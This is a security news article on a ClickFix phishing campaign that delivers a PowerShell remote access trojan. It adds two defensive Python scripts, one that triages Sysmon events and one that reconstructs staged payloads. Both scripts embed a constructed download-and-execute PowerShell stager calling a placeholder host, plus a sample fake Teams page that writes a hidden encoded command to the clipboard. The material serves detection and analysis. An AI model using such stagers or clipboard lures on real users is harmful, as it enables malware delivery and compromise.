Cybercriminals Exploit ClickFix Technique to Target Windows Systems and Execute PowerShell Commands
A new attack campaign is targeting Israeli businesses and infrastructure sectors through the social engineering technique known as "ClickFix," which tricks users into running a malicious PowerShell command on their own Windows systems. The multi-stage chain begins with phishing emails disguised as invitations to educational webinars about handling wartime medical supplies, a lure chosen to exploit current regional tensions. Victims who click the embedded link are redirected to a spoofed Microsoft Teams page, which instructs them to carry out a short sequence of keystrokes (in ClickFix lures this typically means opening the Run dialog with Win+R and pasting a command the page has already placed on the clipboard); completing the sequence launches the PowerShell command that starts the infection chain. Fortinet's FortiMail Workspace Security team identified the intrusion campaign and reported that the entire attack runs through PowerShell, without dropping any external executables.
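Because a ClickFix victim pastes the command into the Run dialog, the resulting powershell.exe is a child of explorer.exe and usually carries hidden-window, policy-bypass and encoded-command switches, with a download-and-execute stager inside the encoded text. The following triage script is an added example, not Fortinet's code and not an artifact of the campaign: it scores constructed Sysmon Event ID 1 style records against those traits and decodes the -EncodedCommand argument so that the download and invoke keywords hidden inside it count as well. The events, the stager text, the example.invalid URL and the scoring weights are all assumptions made for the example.

```python
"""Triage process-creation telemetry for ClickFix-style PowerShell launches.

Added example (not Fortinet's code and not from the campaign). The events below are
constructed Sysmon Event ID 1 style records, not real telemetry; field names follow
Sysmon (ProcessId, ParentImage, Image, CommandLine). Scoring weights are assumptions.
"""
import base64
import re

SHELLS = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # Run dialog and desktop launches come from the shell

# Switch patterns: -w hidden / -WindowStyle Hidden, -ep bypass / -ExecutionPolicy Bypass,
# -e / -ec / -enc / -EncodedCommand followed by a Base64 token.
HIDDEN = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
BYPASS = re.compile(r"(?:^|\s)-e(?:xecutionpolicy|p)\s+bypass\b", re.I)
ENCODED = re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand|c)?\s+(?P<b64>[A-Za-z0-9+/=]{16,})", re.I)
# Content patterns, applied to the command line and to the decoded encoded command.
DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                      r"invoke-restmethod|\birm\b|start-bitstransfer", re.I)
EXEC = re.compile(r"\biex\b|invoke-expression", re.I)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (Base64 of UTF-16LE text), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64")).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Score one event; returns (score, reasons). Non-PowerShell images score 0."""
    reasons, score = [], 0
    if _basename(ev.get("Image", "")) not in SHELLS:
        return 0, reasons
    cmd = ev.get("CommandLine", "")
    if _basename(ev.get("ParentImage", "")) in INTERACTIVE_PARENTS:
        score += 1
        reasons.append("spawned by explorer.exe (Run dialog / shell)")
    text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 2
        reasons.append("encoded command")
        text = cmd + "\n" + decoded  # inspect the hidden script too
    if HIDDEN.search(cmd):
        score += 2
        reasons.append("hidden window")
    if BYPASS.search(cmd):
        score += 1
        reasons.append("execution policy bypass")
    if DOWNLOAD.search(text):
        score += 2
        reasons.append("downloads content")
    if EXEC.search(text):
        score += 1
        reasons.append("invokes fetched text")
    return score, reasons


def triage(events, threshold=4):
    """Return the events at or above the threshold with their score, reasons and decoded command."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"ProcessId": ev.get("ProcessId"), "score": score, "reasons": reasons,
                         "decoded": decode_encoded_command(ev.get("CommandLine", ""))})
    return hits


def _enc(script):  # builds -EncodedCommand arguments for the constructed samples only
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stager and sample events (assumptions, not data from the campaign).
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc " + _enc(STAGE1)},
    {"ProcessId": 4188, "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},  # user opened a console: the parent alone is not enough
    {"ProcessId": 5012, "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Windows\\CCM\\inventory.ps1"},
    {"ProcessId": 5330, "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": PS,
     "CommandLine": "powershell.exe -enc " + _enc("Get-Service -Name WinRM | Select-Object Status")},
    {"ProcessId": 5402, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["ProcessId"], hit["score"], hit["reasons"])
        print("  decoded:", hit["decoded"])
```

Only the first constructed event clears the threshold; the management-agent and svchost launches stay below it even though they use -ExecutionPolicy Bypass or -enc, which is why the parent process and the decoded content are scored together rather than alerting on any single switch.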
The researchers found evidence of lateral movement and surveillance activity, along with possible overlaps with MuddyWater tradecraft, but attribution remains inconclusive because the campaign differs tactically from known MuddyWater operations.

The initial payload is a Base64-encoded PowerShell command split across three strings in the phishing page's HTML; concatenated and decoded, it retrieves and executes a second PowerShell script from the attacker's infrastructure, which is the foothold for the rest of the compromise. That script in turn downloads two files: test.html, which carries a blob of binary-encoded data between special tag markers, and a further PowerShell script that reconstructs the final payload from it. The obfuscation is layered rather than technically advanced: the decoding routine splits the blob into binary-digit chunks, converts each chunk to its ASCII character, and concatenates the result into PowerShell code that is then invoked, a cheap way to keep recognisable PowerShell keywords out of the downloaded files. The final stage is a remote access trojan implemented entirely in PowerShell, which maintains persistent communication with the command-and-control server.
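An analyst who has captured the phishing page and test.html can reconstruct both stages offline. The script below is an added example, not Fortinet's code and not an artifact of the campaign: it joins the three Base64 fragments and decodes the command, then extracts the blob between the tag markers in test.html and converts its binary chunks back to PowerShell text, pulling URLs from each stage as indicators. The page layout it parses (JavaScript variables p1 to p3, `<!--BLOB-->` markers, 8-bit space-separated chunks), the example.invalid URL and every sample string are assumptions made for the example; the real page will need its own fragment and marker patterns.

```python
"""Reconstruct the staged PowerShell payloads from captured ClickFix artifacts.

Added example (not Fortinet's code and not from the campaign). The fragment variable
names, the blob markers, the chunk format and all sample content are assumptions.
"""
import base64
import re

FRAGMENT_RE = re.compile(r'var\s+(p\d+)\s*=\s*"([A-Za-z0-9+/=]*)"')  # assumed page layout
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_b64_text(b64):
    """Decode Base64 text; -EncodedCommand payloads are UTF-16LE, plain stagers are UTF-8."""
    raw = base64.b64decode(b64)
    # ASCII text in UTF-16LE has a NUL in every odd byte.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def recover_stage1(html):
    """Join the split Base64 fragments in fragment-name order and decode the command."""
    parts = dict(FRAGMENT_RE.findall(html))
    return decode_b64_text("".join(parts[name] for name in sorted(parts)))


def extract_blob(html, start="<!--BLOB-->", end="<!--/BLOB-->"):
    """Return the text between the (assumed) tag markers in test.html."""
    i = html.index(start) + len(start)
    j = html.index(end, i)
    return html[i:j].strip()


def decode_binary_chunks(blob):
    """Convert binary-digit chunks to text; handles separated or run-together chunks."""
    chunks = blob.split()
    if len(chunks) == 1:  # no separators: slice into 8-bit groups
        chunks = [blob[k:k + 8] for k in range(0, len(blob), 8)]
    return bytes(int(c, 2) for c in chunks).decode("ascii")


def recover_final_stage(html):
    return decode_binary_chunks(extract_blob(html))


def find_urls(script):
    """Indicator extraction from a decoded stage."""
    return URL_RE.findall(script)


# Constructed samples (assumptions, not captured data). Helpers below only build them.
def _b64(text, encoding):
    return base64.b64encode(text.encode(encoding)).decode("ascii")


def encode_binary(text):
    return " ".join(format(b, "08b") for b in text.encode("ascii"))


STAGE1_COMMAND = "iex ((New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1'))"
_s1 = _b64(STAGE1_COMMAND, "utf-16-le")
_third = len(_s1) // 3
LANDING_PAGE_HTML = f"""<html><body><h1>Microsoft Teams</h1>
<script>
var p1 = "{_s1[:_third]}";
var p2 = "{_s1[_third:2 * _third]}";
var p3 = "{_s1[2 * _third:]}";
navigator.clipboard.writeText("powershell -w hidden -enc " + p1 + p2 + p3);
</script></body></html>"""

FINAL_STAGE = "Write-Output 'final stage placeholder (constructed)'"
TEST_HTML = ("<html><body><p>loading...</p>\n<!--BLOB-->\n"
             + encode_binary(FINAL_STAGE) + "\n<!--/BLOB-->\n</body></html>")

if __name__ == "__main__":
    stage1 = recover_stage1(LANDING_PAGE_HTML)
    print("stage 1:", stage1)
    print("indicators:", find_urls(stage1))
    print("final stage:", recover_final_stage(TEST_HTML))
```

The UTF-16LE check matters in practice: a command that the page hands to `powershell -enc` decodes to garbage under UTF-8, while a stager the script itself Base64-decodes is usually UTF-8, so the helper picks the encoding from the byte pattern rather than assuming one.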
Categories: Cybersecurity Threats, Social Engineering Attacks, Malware Delivery Techniques
Tags: ClickFix, Social Engineering, Phishing, PowerShell, Malware, Obfuscation, Remote Access Trojan, Lateral Movement, Infrastructure, Cybersecurity